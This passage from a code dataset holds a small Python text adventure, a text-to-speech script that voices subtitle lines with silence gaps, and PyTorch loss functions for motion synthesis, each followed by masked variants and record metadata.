"step-5": "from room import Room\nfrom player import Player\nfrom item import Item\n# Declare all the rooms\nitems = {\n 'scimitar': Item('Scimitar', '+7 Attack'),\n 'mace': Item('Mace', '+13 Attack'),\n 'tower_shield': Item('Tower Shield', '+8 Block'),\n 'heraldic_shield': Item('Heraldic Shield', '+12 Block'),\n 'chainmail': Item('Chainmail', '+15 Defense'),\n 'gold_plate': Item('Gold Plate', '+25 Defense'),\n 'health_potion': Item('Health Potion', 'Heal 10 HP'),\n 'mana_potion': Item('Mana Potion', 'Restore 20 Mana'),\n 'gold': Item('Gold', 'Currency for other items from vendors'),\n 'demon_heart': Item('Demon Heart', 'Bestows owner with great power')\n}\n\nroom = {\n 'outside': Room(\"Outside Cave Entrance\",\n \"\"\"North of you, the cave mount beckons\"\"\",\n [items['scimitar'], items['health_potion']]),\n\n 'foyer': Room(\"Foyer\", \"\"\"Dim light filters in from the south. Dusty\npassages run north and east.\"\"\",\n[items['tower_shield'], items['chainmail']]),\n\n 'overlook': Room(\"Grand Overlook\", \"\"\"A steep cliff appears before you, falling\ninto the darkness. Ahead to the north, a light flickers in\nthe distance, but there is no way across the chasm.\"\"\",\n[items['mace'], items['mana_potion']]),\n\n 'narrow': Room(\"Narrow Passage\", \"\"\"The narrow passage bends here from west\nto north. The smell of gold permeates the air.\"\"\",\n[items['gold_plate'], items['heraldic_shield']]),\n\n 'treasure': Room(\"Treasure Chamber\", \"\"\"You've found the long-lost treasure\nchamber! Sadly, it has already been completely emptied by\nearlier adventurers. The only exit is to the south.\"\"\",\n[items['gold'], items['demon_heart']]),\n}\n\n# Link rooms together\nroom['outside'].n_to = room['foyer']\nroom['foyer'].s_to = room['outside']\nroom['foyer'].n_to = room['overlook']\nroom['foyer'].e_to = room['narrow']\nroom['overlook'].s_to = room['foyer']\nroom['narrow'].w_to = room['foyer']\nroom['narrow'].n_to = room['treasure']\nroom['treasure'].s_to = room['narrow']\n\n# Main\n\nplayer = Player(room['outside'])\n\nsuppressRoomPrint = False\n\nwhile True:\n if suppressRoomPrint:\n suppressRoomPrint = False\n else:\n print (player.location)\n print (f'\\n{player.location.name}\\n {player.location.description}\\n {player.location.getItems()}\\n')\n inp = input(\"What is your command: \")\n\n if inp == \"q\":\n break\n if inp == \"n\" or inp == \"s\" or inp == \"w\" or inp == \"e\":\n newRoom = player.location.getRoomInDirection(inp)\n if newRoom == None:\n print('\\x1b[1;37;41m + \\nImpossible, try again.\\n\\x1b[0m')\n suppressRoomPrint = True\n else:\n player.change_location(newRoom)",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
import pyttsx3
from pydub import AudioSegment
engine = pyttsx3.init() # object creation
""" RATE"""
#printing current voice rate
engine.setProperty('rate', 150) # setting up new voice rate
rate = engine.getProperty('rate') # getting details of current speaking rate
print (rate)
"""VOLUME"""
# volume = engine.getProperty('volume') #getting to know current volume level (min=0 and max=1)
# print (volume) #printing current volume level
# engine.setProperty('volume',1.0) # setting up volume level between 0 and 1
# """VOICE"""
# voices = engine.getProperty('voices') #getting details of current voice
# #engine.setProperty('voice', voices[0].id) #changing index, changes voices. o for male
# engine.setProperty('voice', voices[1].id) #changing index, changes voices. 1 for female
# engine.say("Hello World!")
# engine.say('My current speaking rate is ' + str(rate))
# engine.runAndWait()
# engine.stop()
"""Saving Voice to a file"""
# On linux make sure that 'espeak' and 'ffmpeg' are installed
a=open('TrumpNewFF.srt').readlines()
i=2
l = len(a)
while i<l:
engine.save_to_file(a[i], 'TTS/trump/{}.mp3'.format(str(i)))
engine.runAndWait()
if i+3<l:
time_1 = a[i-1].split(' --> ')[1].split(':')
time_1_mil = time_1[-1].split(',')
time_1_mil = int(time_1_mil[0])*1000+int(time_1_mil[1])%1000
time_1_hour = float(time_1[-2])*60000
time_2 = a[i+3].split(' --> ')[0].split(':')
time_2_hour = float(time_2[-2])*60000
time_2_mil = time_2[-1].split(',')
time_2_mil = int(time_2_mil[0])*1000+int(time_2_mil[1])%1000
duration = float(time_2_hour+time_2_mil)-float(time_1_hour+time_1_mil)
        # create a silent segment spanning the gap until the next subtitle starts
        silence_segment = AudioSegment.silent(duration=int(duration)) #duration in milliseconds
        print(i, duration, time_2_hour+time_2_mil, time_1_hour+time_1_mil)
        # save the silence gap; note the data is written as WAV even though the
        # file name reuses the .mp3 extension of the generated speech clips
        silence_segment.export('TTS/trump/{}.mp3'.format(str(i+1)), format="wav")
i+=4
engine.stop()
|
normal
|
{
"blob_id": "32f4f7ad61b99848c907e092c5ed7a839f0b352b",
"index": 6399,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nengine.setProperty('rate', 150)\n<mask token>\nprint(rate)\n<mask token>\nwhile i < l:\n engine.save_to_file(a[i], 'TTS/trump/{}.mp3'.format(str(i)))\n engine.runAndWait()\n if i + 3 < l:\n time_1 = a[i - 1].split(' --> ')[1].split(':')\n time_1_mil = time_1[-1].split(',')\n time_1_mil = int(time_1_mil[0]) * 1000 + int(time_1_mil[1]) % 1000\n time_1_hour = float(time_1[-2]) * 60000\n time_2 = a[i + 3].split(' --> ')[0].split(':')\n time_2_hour = float(time_2[-2]) * 60000\n time_2_mil = time_2[-1].split(',')\n time_2_mil = int(time_2_mil[0]) * 1000 + int(time_2_mil[1]) % 1000\n duration = float(time_2_hour + time_2_mil) - float(time_1_hour +\n time_1_mil)\n one_sec_segment = AudioSegment.silent(duration=int(duration))\n print(i, duration, time_2_hour + time_2_mil, time_1_hour + time_1_mil)\n one_sec_segment.export('TTS/trump/{}.mp3'.format(str(i + 1)),\n format='wav')\n i += 4\nengine.stop()\n",
"step-3": "<mask token>\nengine = pyttsx3.init()\n<mask token>\nengine.setProperty('rate', 150)\nrate = engine.getProperty('rate')\nprint(rate)\n<mask token>\na = open('TrumpNewFF.srt').readlines()\ni = 2\nl = len(a)\nwhile i < l:\n engine.save_to_file(a[i], 'TTS/trump/{}.mp3'.format(str(i)))\n engine.runAndWait()\n if i + 3 < l:\n time_1 = a[i - 1].split(' --> ')[1].split(':')\n time_1_mil = time_1[-1].split(',')\n time_1_mil = int(time_1_mil[0]) * 1000 + int(time_1_mil[1]) % 1000\n time_1_hour = float(time_1[-2]) * 60000\n time_2 = a[i + 3].split(' --> ')[0].split(':')\n time_2_hour = float(time_2[-2]) * 60000\n time_2_mil = time_2[-1].split(',')\n time_2_mil = int(time_2_mil[0]) * 1000 + int(time_2_mil[1]) % 1000\n duration = float(time_2_hour + time_2_mil) - float(time_1_hour +\n time_1_mil)\n one_sec_segment = AudioSegment.silent(duration=int(duration))\n print(i, duration, time_2_hour + time_2_mil, time_1_hour + time_1_mil)\n one_sec_segment.export('TTS/trump/{}.mp3'.format(str(i + 1)),\n format='wav')\n i += 4\nengine.stop()\n",
"step-4": "import pyttsx3\nfrom pydub import AudioSegment\nengine = pyttsx3.init()\n<mask token>\nengine.setProperty('rate', 150)\nrate = engine.getProperty('rate')\nprint(rate)\n<mask token>\na = open('TrumpNewFF.srt').readlines()\ni = 2\nl = len(a)\nwhile i < l:\n engine.save_to_file(a[i], 'TTS/trump/{}.mp3'.format(str(i)))\n engine.runAndWait()\n if i + 3 < l:\n time_1 = a[i - 1].split(' --> ')[1].split(':')\n time_1_mil = time_1[-1].split(',')\n time_1_mil = int(time_1_mil[0]) * 1000 + int(time_1_mil[1]) % 1000\n time_1_hour = float(time_1[-2]) * 60000\n time_2 = a[i + 3].split(' --> ')[0].split(':')\n time_2_hour = float(time_2[-2]) * 60000\n time_2_mil = time_2[-1].split(',')\n time_2_mil = int(time_2_mil[0]) * 1000 + int(time_2_mil[1]) % 1000\n duration = float(time_2_hour + time_2_mil) - float(time_1_hour +\n time_1_mil)\n one_sec_segment = AudioSegment.silent(duration=int(duration))\n print(i, duration, time_2_hour + time_2_mil, time_1_hour + time_1_mil)\n one_sec_segment.export('TTS/trump/{}.mp3'.format(str(i + 1)),\n format='wav')\n i += 4\nengine.stop()\n",
"step-5": "import pyttsx3\r\nfrom pydub import AudioSegment\r\n\r\nengine = pyttsx3.init() # object creation\r\n\r\n\"\"\" RATE\"\"\"\r\n #printing current voice rate\r\nengine.setProperty('rate', 150) # setting up new voice rate\r\nrate = engine.getProperty('rate') # getting details of current speaking rate\r\nprint (rate) \r\n\r\n\"\"\"VOLUME\"\"\"\r\n# volume = engine.getProperty('volume') #getting to know current volume level (min=0 and max=1)\r\n# print (volume) #printing current volume level\r\n# engine.setProperty('volume',1.0) # setting up volume level between 0 and 1\r\n\r\n# \"\"\"VOICE\"\"\"\r\n# voices = engine.getProperty('voices') #getting details of current voice\r\n# #engine.setProperty('voice', voices[0].id) #changing index, changes voices. o for male\r\n# engine.setProperty('voice', voices[1].id) #changing index, changes voices. 1 for female\r\n\r\n# engine.say(\"Hello World!\")\r\n# engine.say('My current speaking rate is ' + str(rate))\r\n# engine.runAndWait()\r\n# engine.stop()\r\n\r\n\"\"\"Saving Voice to a file\"\"\"\r\n# On linux make sure that 'espeak' and 'ffmpeg' are installed\r\na=open('TrumpNewFF.srt').readlines()\r\ni=2\r\nl = len(a)\r\nwhile i<l:\r\n engine.save_to_file(a[i], 'TTS/trump/{}.mp3'.format(str(i)))\r\n engine.runAndWait()\r\n if i+3<l:\r\n time_1 = a[i-1].split(' --> ')[1].split(':')\r\n time_1_mil = time_1[-1].split(',')\r\n time_1_mil = int(time_1_mil[0])*1000+int(time_1_mil[1])%1000\r\n time_1_hour = float(time_1[-2])*60000\r\n \r\n time_2 = a[i+3].split(' --> ')[0].split(':')\r\n time_2_hour = float(time_2[-2])*60000\r\n time_2_mil = time_2[-1].split(',')\r\n time_2_mil = int(time_2_mil[0])*1000+int(time_2_mil[1])%1000\r\n \r\n duration = float(time_2_hour+time_2_mil)-float(time_1_hour+time_1_mil) \r\n # create 1 sec of silence audio segment\r\n one_sec_segment = AudioSegment.silent(duration=int(duration)) #duration in milliseconds\r\n \r\n \r\n print(i, duration, time_2_hour+time_2_mil, time_1_hour+time_1_mil)\r\n #Either save modified audio\r\n one_sec_segment.export('TTS/trump/{}.mp3'.format(str(i+1)), format=\"wav\")\r\n i+=4\r\nengine.stop()",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
import torch
import torch.nn as nn
class ReconstructionLoss(nn.Module):
def __init__(self, config):
super(ReconstructionLoss, self).__init__()
self.velocity_dim = config.velocity_dim
def forward(self, pre_seq, gt_seq):
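        # In-between frames are scored on all features, the last frame is scored
        # separately on all features, and the first frame is scored without its
        # velocity channels.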
MSE_loss = nn.MSELoss()
rec_loss = MSE_loss(pre_seq[:, 1:-1, :], gt_seq[:, 1:-1, :])+ \
MSE_loss(pre_seq[:, -1, :], gt_seq[:, -1, :]) + \
MSE_loss(pre_seq[:, 0, :-self.velocity_dim], gt_seq[:, 0, :-self.velocity_dim])
return rec_loss * 3
class BoneLoss(nn.Module):
def __init__(self, gt_bone_length, parents, _mean, _std, config):
super(BoneLoss, self).__init__()
self.gt_bone_length = gt_bone_length
self.parents = parents
self._mean = _mean
self._std = _std
self.device = config.device
self.pos_dim = config.pos_dim
def calculate_bone_length_for_seq(self, seq):
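        # De-normalizes the joint positions, prepends a fixed root joint at the
        # origin, and returns each joint's distance to its parent per frame,
        # i.e. the per-frame bone lengths.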
# AddBackward0 [batch_size, T, size]
src_seq = seq[..., :self.pos_dim] * self._std[:self.pos_dim] + self._mean[:self.pos_dim]
# ViewBackward [batch_size, T, J-1, 3]
new_seq = src_seq.view(src_seq.shape[0], src_seq.shape[1], int(src_seq.shape[2] / 3), 3)
root_pos = torch.tensor([[0, 0, 0]], dtype=torch.float32).to(self.device)
root_positions = torch.unsqueeze(torch.unsqueeze(root_pos, 0), 0)
root_positions = root_positions.repeat(src_seq.shape[0], src_seq.shape[1], 1, 1)
# CatBackward [batch_size, T, J, 3]
positions = torch.cat((root_positions, new_seq), 2)
# [200, 6, 23]
result_list = torch.empty((src_seq.shape[0], src_seq.shape[1], int(src_seq.shape[2] / 3)),
dtype=torch.float32).to(self.device)
index = 0
for joint, parent in enumerate(self.parents):
if parent == -1:
continue
# [200, 6, 3] SelectBackward
joint_pos = positions[:, :, joint]
parent_pos = positions[:, :, parent]
# [200, 6] SubBackward0
delta_x = joint_pos[..., 0] - parent_pos[..., 0]
delta_y = joint_pos[..., 1] - parent_pos[..., 1]
delta_z = joint_pos[..., 2] - parent_pos[..., 2]
# [200, 6] PowBackward0
length_temp = (delta_x ** 2 + delta_y ** 2 + delta_z ** 2) ** 0.5
result_list[..., index] = length_temp
index += 1
return result_list
def forward(self, predict_seq, _train_x1, _train_x2):
train_bone_length = self.calculate_bone_length_for_seq(predict_seq)
_, gt_bone_length = torch.broadcast_tensors(train_bone_length, self.gt_bone_length)
MSE_loss = nn.MSELoss()
bone_loss = MSE_loss(train_bone_length, gt_bone_length)
return bone_loss * 2
class VelocityLoss(nn.Module):
def __init__(self, _mean, _std, config):
super(VelocityLoss, self).__init__()
self._mean = _mean
self._std = _std
self.device = config.device
self.root_pos_dim = config.root_pos_dim
self.pos_dim = config.pos_dim
self.velocity_dim = config.velocity_dim
self.vel_factor_dim = config.vel_factor_dim
def calculate_velocity(self, src_pos_seq, src_init_pos):
"""
        :param src_pos_seq: positions of the predicted sequence, [batch_size, seq_length, J * 3]
        :param src_init_pos: positions of the initial frame, [batch_size, J * 3]
        :return: frame-to-frame velocities, [batch_size, seq_length, J * 3]
"""
# [batch_size, T + 1, J * 3] grad_fn=<CatBackward>
temp_positions = torch.cat((torch.unsqueeze(src_init_pos, 1), src_pos_seq), 1)
velocity = temp_positions[:, 1:] - temp_positions[:, :-1]
return velocity
def get_vel_factor(self, velocity):
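        # For each of the five body-part groups encoded in `parts`, computes a
        # weighted average joint speed: factor_p = sum_j (w_j / W_p) * ||v_j||,
        # summing over joints j in part p, with W_p the part's total weight.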
batch_size = velocity.shape[0]
seq_len = velocity.shape[1]
joint_num = int(velocity.shape[-1] / 3)
weight = [1, 2, 3, 4, 1, 2, 3, 4, 1, 1, 1, 1, 1, 1, 2, 3, 4, 1, 2, 3, 4, 1, 2, 1]
parts = [1, 1, 1, 1, 2, 2, 2, 2, 0, 0, 0, 0, 0, 3, 3, 3, 3, 4, 4, 4, 4, 0, 0, 0]
weight_sum = []
for part in range(5):
p_sum = 0
for j in range(joint_num):
if parts[j] == part:
p_sum += weight[j]
weight_sum.append(p_sum)
vel_factor = torch.empty((batch_size, seq_len, self.vel_factor_dim), dtype=torch.float32).to(self.device)
for i in range(seq_len):
factor = torch.zeros((batch_size, self.vel_factor_dim), dtype=torch.float32).to(self.device)
for part in range(5):
for j in range(joint_num):
if parts[j] == part:
factor[:, part: part + 1] = factor[:, part: part + 1] + weight[j] / weight_sum[part] * \
pow(pow(velocity[:, i:i + 1, j * 3], 2) +
pow(velocity[:, i:i + 1, j * 3 + 1], 2) +
pow(velocity[:, i:i + 1, j * 3 + 2], 2), 0.5)
vel_factor[:, i, :] = factor
return vel_factor
def forward(self, predict_seq, _train_x1, _train_x2, _true_vel_factor):
# velocity
init_pos = _train_x1[:, 0, :self.pos_dim + self.root_pos_dim]
src_pos_seq = (predict_seq[..., :self.pos_dim + self.root_pos_dim] *
self._std[:self.pos_dim + self.root_pos_dim] + self._mean[:self.pos_dim + self.root_pos_dim])
src_init_pos = (init_pos *
self._std[:self.pos_dim + self.root_pos_dim] + self._mean[:self.pos_dim + self.root_pos_dim])
train_velocity = self.calculate_velocity(src_pos_seq, src_init_pos)
# grad_fn=<DivBackward0>
_train_velocity = (train_velocity -
self._mean[-(self.velocity_dim + self.vel_factor_dim):-self.vel_factor_dim]) \
/ self._std[-(self.velocity_dim + self.vel_factor_dim):-self.vel_factor_dim]
train_vel_factor = self.get_vel_factor(train_velocity)
_train_vel_factor = (train_vel_factor - self._mean[-self.vel_factor_dim:]) / self._std[-self.vel_factor_dim:]
MSE_loss = nn.MSELoss()
zero_seq = torch.zeros(predict_seq[:, 0, -self.velocity_dim:].shape).to(self.device)
loss1 = MSE_loss(predict_seq[:, 1:, -self.velocity_dim:], _train_velocity[:, 1:, :]) * 10 \
+ MSE_loss(predict_seq[:, 0, -self.velocity_dim:], zero_seq) * 20
loss2 = MSE_loss(_true_vel_factor[:, 1:-1, :], _train_vel_factor[:, 1:, :]) * 10
velocity_loss = loss1 * 2 + loss2 * 1.5
return velocity_loss
class ContactLoss(nn.Module):
def __init__(self, _mean, _std, config):
super(ContactLoss, self).__init__()
self._mean = _mean
self._std = _std
self.root_pos_dim = config.root_pos_dim
self.pos_dim = config.pos_dim
self.contact_dim = config.contact_dim
self.velocity_dim = config.velocity_dim
self.left_feet = config.left_foot
self.right_feet = config.right_foot
self.vel_factor_dim = config.vel_factor_dim
self.contact_loc = self.contact_dim + self.velocity_dim + self.vel_factor_dim
def calculate_foot_vels(self, src_pos_seq, src_init_pos, left_foot, right_foot):
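        # Squared per-frame displacement of the two joints of each foot (indices
        # taken from the config); `forward` multiplies these by the predicted
        # contact labels to penalize foot sliding on contact frames.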
# [batch_size, T + 1, J * 3] grad_fn=<CatBackward>
temp_positions = torch.cat((torch.unsqueeze(src_init_pos, 1), src_pos_seq), 1)
left_foot0_vel = (temp_positions[:, 1:, left_foot[0] * 3:(left_foot[0] * 3 + 3)]
- temp_positions[:, :-1, left_foot[0] * 3:(left_foot[0] * 3 + 3)]) ** 2
left_foot0_vel = torch.sum(left_foot0_vel, -1, keepdim=True)
left_foot1_vel = (temp_positions[:, 1:, left_foot[1] * 3:(left_foot[1] * 3 + 3)]
- temp_positions[:, :-1, left_foot[1] * 3:(left_foot[1] * 3 + 3)]) ** 2
left_foot1_vel = torch.sum(left_foot1_vel, -1, keepdim=True)
right_foot0_vel = (temp_positions[:, 1:, right_foot[0] * 3:(right_foot[0] * 3 + 3)]
- temp_positions[:, :-1, right_foot[0] * 3:(right_foot[0] * 3 + 3)]) ** 2
right_foot0_vel = torch.sum(right_foot0_vel, -1, keepdim=True)
right_foot1_vel = (temp_positions[:, 1:, right_foot[1] * 3:(right_foot[1] * 3 + 3)]
- temp_positions[:, :-1, right_foot[1] * 3:(right_foot[1] * 3 + 3)]) ** 2
right_foot1_vel = torch.sum(right_foot1_vel, -1, keepdim=True)
feet_vel = torch.cat((left_foot0_vel, left_foot1_vel, right_foot0_vel, right_foot1_vel), -1)
return feet_vel # [batch_size, seq_size, 4]
def forward(self, predict_seq, _train_x1, _train_x2):
init_pos = _train_x1[:, 0, :self.pos_dim + self.root_pos_dim]
src_pos_seq = (predict_seq[..., :self.pos_dim + self.root_pos_dim] *
self._std[:self.pos_dim + self.root_pos_dim] + self._mean[:self.pos_dim + self.root_pos_dim])
src_init_pos = (init_pos *
self._std[:self.pos_dim + self.root_pos_dim] + self._mean[:self.pos_dim + self.root_pos_dim])
feet_vels = self.calculate_foot_vels(src_pos_seq, src_init_pos, self.left_feet,
self.right_feet)
feet_contact = torch.abs(predict_seq[..., -(self.contact_dim + self.velocity_dim):-self.velocity_dim] *
self._std[-self.contact_loc:-(self.velocity_dim + self.vel_factor_dim)] + \
self._mean[-self.contact_loc:-(self.velocity_dim + self.vel_factor_dim)])
contact_loss = torch.mean(torch.sum(torch.sum(feet_contact * feet_vels, dim=-1), dim=-1))
return contact_loss * 2
class KeyframeLoss(nn.Module):
def __init__(self, config):
super().__init__()
self.device = config.device
self.root_pos_dim = config.root_pos_dim
self.root_rot_dim = config.root_rot_dim
self.pos_dim = config.pos_dim
self.key_num = config.key_num
def forward(self, predict_seq, _train_x1, gt_seq):
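        # Short sequences: every frame is pulled toward a time-weighted blend of
        # the two keyframes. Longer sequences: only the first and last `key_num`
        # frames are constrained to their respective keyframes.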
key_frame1 = _train_x1[:, 0, :self.pos_dim + self.root_pos_dim + self.root_rot_dim]
key_frame2 = gt_seq[:, -1, :self.pos_dim + self.root_pos_dim + self.root_rot_dim]
predict_pos = predict_seq[:, :, :self.pos_dim + self.root_pos_dim + self.root_rot_dim]
num = predict_pos.shape[1]
MSE_loss = nn.MSELoss()
loss = torch.zeros([]).to(self.device)
if num <= self.key_num * 2:
for i in range(num):
t = (i + 1) / (num + 1)
pos = predict_pos[:, i, :]
loss = loss + (1 - t) * MSE_loss(pos, key_frame1) + t * MSE_loss(pos, key_frame2)
else:
for i in range(self.key_num):
loss = loss + MSE_loss(predict_pos[:, i, :], key_frame1)
for i in range(num - self.key_num, num):
loss = loss + MSE_loss(predict_pos[:, i, :], key_frame2)
return loss * 2
class SmoothLoss(nn.Module):
def __init__(self, config):
super().__init__()
self.device = config.device
self.root_pos_dim = config.root_pos_dim
self.root_rot_dim = config.root_rot_dim
self.pos_dim = config.pos_dim
def forward(self, predict_seq, _train_x1, gt_seq):
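        # Penalizes frame-to-frame changes of the root position and rotation,
        # anchoring the first and last predicted frames to the given boundary
        # frames.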
init_root_pos = _train_x1[:, :1, self.pos_dim:self.pos_dim + self.root_pos_dim]
init_root_rot = _train_x1[:, :1, self.pos_dim + self.root_pos_dim:
self.pos_dim + self.root_pos_dim + self.root_rot_dim]
root_pos_seq = predict_seq[..., self.pos_dim:self.pos_dim + self.root_pos_dim]
root_rot_seq = predict_seq[..., self.pos_dim + self.root_pos_dim:
self.pos_dim + self.root_pos_dim + self.root_rot_dim]
last_root_pos = gt_seq[:, -1, self.pos_dim:self.pos_dim + self.root_pos_dim]
last_root_rot = gt_seq[:, -1, self.pos_dim + self.root_pos_dim:
self.pos_dim + self.root_pos_dim + self.root_rot_dim]
# pos_seq SliceBackward
seq_num = len(root_pos_seq[0])
batch_size = len(root_pos_seq)
root_pos_item = torch.zeros([]).to(self.device)
root_rot_item = torch.zeros([]).to(self.device)
MSE_loss = nn.MSELoss()
for idx in range(seq_num):
if idx == 0:
# MeanBackward0
root_pos_temp = MSE_loss(root_pos_seq[:, :1, :], init_root_pos[:])
root_rot_temp = MSE_loss(root_rot_seq[:, :1, :], init_root_rot[:])
elif idx == seq_num - 1:
root_pos_temp = MSE_loss(root_pos_seq[:, idx, :], last_root_pos) + \
MSE_loss(root_pos_seq[:, idx - 1, :], last_root_pos)
root_rot_temp = MSE_loss(root_rot_seq[:, idx, :], last_root_rot) + \
MSE_loss(root_rot_seq[:, idx - 1, :], last_root_rot)
else:
root_pos_temp = torch.sum(torch.pow(root_pos_seq[:, idx, :] - root_pos_seq[:, idx - 1, :], 2)) \
/ batch_size / seq_num
root_rot_temp = torch.sum(torch.pow(root_rot_seq[:, idx, :] - root_rot_seq[:, idx - 1, :], 2)) \
/ batch_size / seq_num
# AddBackward0
root_pos_item = root_pos_item + root_pos_temp
root_rot_item = root_rot_item + root_rot_temp
loss = root_pos_item + root_rot_item # DivBackward0
return loss * 1.5
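# ---------------------------------------------------------------------------
# Hedged usage sketch (not part of the original module): it combines a few of
# the losses above on random tensors to show the call signatures. The
# dimensions in `cfg` below are illustrative assumptions, not the real
# experiment configuration; losses that need dataset statistics (mean/std,
# ground-truth bone lengths) are omitted.
if __name__ == "__main__":
    import types
    cfg = types.SimpleNamespace(
        device="cpu",
        pos_dim=69,  # assumed: 23 non-root joints * 3
        root_pos_dim=3,
        root_rot_dim=4,  # assumed: root rotation stored as a quaternion
        velocity_dim=72,  # assumed: (23 joints + root) * 3
        key_num=2,
    )
    feat_dim = cfg.pos_dim + cfg.root_pos_dim + cfg.root_rot_dim + cfg.velocity_dim
    batch_size, seq_len = 4, 8
    pre_seq = torch.randn(batch_size, seq_len, feat_dim)
    gt_seq = torch.randn(batch_size, seq_len, feat_dim)
    train_x1 = torch.randn(batch_size, seq_len, feat_dim)
    rec_loss = ReconstructionLoss(cfg)(pre_seq, gt_seq)
    key_loss = KeyframeLoss(cfg)(pre_seq, train_x1, gt_seq)
    smooth_loss = SmoothLoss(cfg)(pre_seq, train_x1, gt_seq)
    # Each module already applies its own weight, so a plain sum is enough here.
    total_loss = rec_loss + key_loss + smooth_loss
    print(rec_loss.item(), key_loss.item(), smooth_loss.item(), total_loss.item())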
|
normal
|
{
"blob_id": "edc66bdc365f9c40ee33249bd2d02c0c5f28256a",
"index": 8386,
"step-1": "<mask token>\n\n\nclass VelocityLoss(nn.Module):\n\n def __init__(self, _mean, _std, config):\n super(VelocityLoss, self).__init__()\n self._mean = _mean\n self._std = _std\n self.device = config.device\n self.root_pos_dim = config.root_pos_dim\n self.pos_dim = config.pos_dim\n self.velocity_dim = config.velocity_dim\n self.vel_factor_dim = config.vel_factor_dim\n\n def calculate_velocity(self, src_pos_seq, src_init_pos):\n \"\"\"\n :param pos_seq: the position of predict sequence [Batch_size, seq_length, J * 3]\n :param init_pos: the position of initial frame\n :return:\n \"\"\"\n temp_positions = torch.cat((torch.unsqueeze(src_init_pos, 1),\n src_pos_seq), 1)\n velocity = temp_positions[:, 1:] - temp_positions[:, :-1]\n return velocity\n <mask token>\n\n def forward(self, predict_seq, _train_x1, _train_x2, _true_vel_factor):\n init_pos = _train_x1[:, 0, :self.pos_dim + self.root_pos_dim]\n src_pos_seq = predict_seq[..., :self.pos_dim + self.root_pos_dim\n ] * self._std[:self.pos_dim + self.root_pos_dim] + self._mean[:\n self.pos_dim + self.root_pos_dim]\n src_init_pos = init_pos * self._std[:self.pos_dim + self.root_pos_dim\n ] + self._mean[:self.pos_dim + self.root_pos_dim]\n train_velocity = self.calculate_velocity(src_pos_seq, src_init_pos)\n _train_velocity = (train_velocity - self._mean[-(self.velocity_dim +\n self.vel_factor_dim):-self.vel_factor_dim]) / self._std[-(self.\n velocity_dim + self.vel_factor_dim):-self.vel_factor_dim]\n train_vel_factor = self.get_vel_factor(train_velocity)\n _train_vel_factor = (train_vel_factor - self._mean[-self.\n vel_factor_dim:]) / self._std[-self.vel_factor_dim:]\n MSE_loss = nn.MSELoss()\n zero_seq = torch.zeros(predict_seq[:, 0, -self.velocity_dim:].shape\n ).to(self.device)\n loss1 = MSE_loss(predict_seq[:, 1:, -self.velocity_dim:],\n _train_velocity[:, 1:, :]) * 10 + MSE_loss(predict_seq[:, 0, -\n self.velocity_dim:], zero_seq) * 20\n loss2 = MSE_loss(_true_vel_factor[:, 1:-1, :], _train_vel_factor[:,\n 1:, :]) * 10\n velocity_loss = loss1 * 2 + loss2 * 1.5\n return velocity_loss\n\n\nclass ContactLoss(nn.Module):\n\n def __init__(self, _mean, _std, config):\n super(ContactLoss, self).__init__()\n self._mean = _mean\n self._std = _std\n self.root_pos_dim = config.root_pos_dim\n self.pos_dim = config.pos_dim\n self.contact_dim = config.contact_dim\n self.velocity_dim = config.velocity_dim\n self.left_feet = config.left_foot\n self.right_feet = config.right_foot\n self.vel_factor_dim = config.vel_factor_dim\n self.contact_loc = (self.contact_dim + self.velocity_dim + self.\n vel_factor_dim)\n\n def calculate_foot_vels(self, src_pos_seq, src_init_pos, left_foot,\n right_foot):\n temp_positions = torch.cat((torch.unsqueeze(src_init_pos, 1),\n src_pos_seq), 1)\n left_foot0_vel = (temp_positions[:, 1:, left_foot[0] * 3:left_foot[\n 0] * 3 + 3] - temp_positions[:, :-1, left_foot[0] * 3:left_foot\n [0] * 3 + 3]) ** 2\n left_foot0_vel = torch.sum(left_foot0_vel, -1, keepdim=True)\n left_foot1_vel = (temp_positions[:, 1:, left_foot[1] * 3:left_foot[\n 1] * 3 + 3] - temp_positions[:, :-1, left_foot[1] * 3:left_foot\n [1] * 3 + 3]) ** 2\n left_foot1_vel = torch.sum(left_foot1_vel, -1, keepdim=True)\n right_foot0_vel = (temp_positions[:, 1:, right_foot[0] * 3:\n right_foot[0] * 3 + 3] - temp_positions[:, :-1, right_foot[0] *\n 3:right_foot[0] * 3 + 3]) ** 2\n right_foot0_vel = torch.sum(right_foot0_vel, -1, keepdim=True)\n right_foot1_vel = (temp_positions[:, 1:, right_foot[1] * 3:\n right_foot[1] * 3 + 3] - temp_positions[:, :-1, 
right_foot[1] *\n 3:right_foot[1] * 3 + 3]) ** 2\n right_foot1_vel = torch.sum(right_foot1_vel, -1, keepdim=True)\n feet_vel = torch.cat((left_foot0_vel, left_foot1_vel,\n right_foot0_vel, right_foot1_vel), -1)\n return feet_vel\n\n def forward(self, predict_seq, _train_x1, _train_x2):\n init_pos = _train_x1[:, 0, :self.pos_dim + self.root_pos_dim]\n src_pos_seq = predict_seq[..., :self.pos_dim + self.root_pos_dim\n ] * self._std[:self.pos_dim + self.root_pos_dim] + self._mean[:\n self.pos_dim + self.root_pos_dim]\n src_init_pos = init_pos * self._std[:self.pos_dim + self.root_pos_dim\n ] + self._mean[:self.pos_dim + self.root_pos_dim]\n feet_vels = self.calculate_foot_vels(src_pos_seq, src_init_pos,\n self.left_feet, self.right_feet)\n feet_contact = torch.abs(predict_seq[..., -(self.contact_dim + self\n .velocity_dim):-self.velocity_dim] * self._std[-self.\n contact_loc:-(self.velocity_dim + self.vel_factor_dim)] + self.\n _mean[-self.contact_loc:-(self.velocity_dim + self.vel_factor_dim)]\n )\n contact_loss = torch.mean(torch.sum(torch.sum(feet_contact *\n feet_vels, dim=-1), dim=-1))\n return contact_loss * 2\n\n\nclass KeyframeLoss(nn.Module):\n\n def __init__(self, config):\n super().__init__()\n self.device = config.device\n self.root_pos_dim = config.root_pos_dim\n self.root_rot_dim = config.root_rot_dim\n self.pos_dim = config.pos_dim\n self.key_num = config.key_num\n\n def forward(self, predict_seq, _train_x1, gt_seq):\n key_frame1 = _train_x1[:, 0, :self.pos_dim + self.root_pos_dim +\n self.root_rot_dim]\n key_frame2 = gt_seq[:, -1, :self.pos_dim + self.root_pos_dim + self\n .root_rot_dim]\n predict_pos = predict_seq[:, :, :self.pos_dim + self.root_pos_dim +\n self.root_rot_dim]\n num = predict_pos.shape[1]\n MSE_loss = nn.MSELoss()\n loss = torch.zeros([]).to(self.device)\n if num <= self.key_num * 2:\n for i in range(num):\n t = (i + 1) / (num + 1)\n 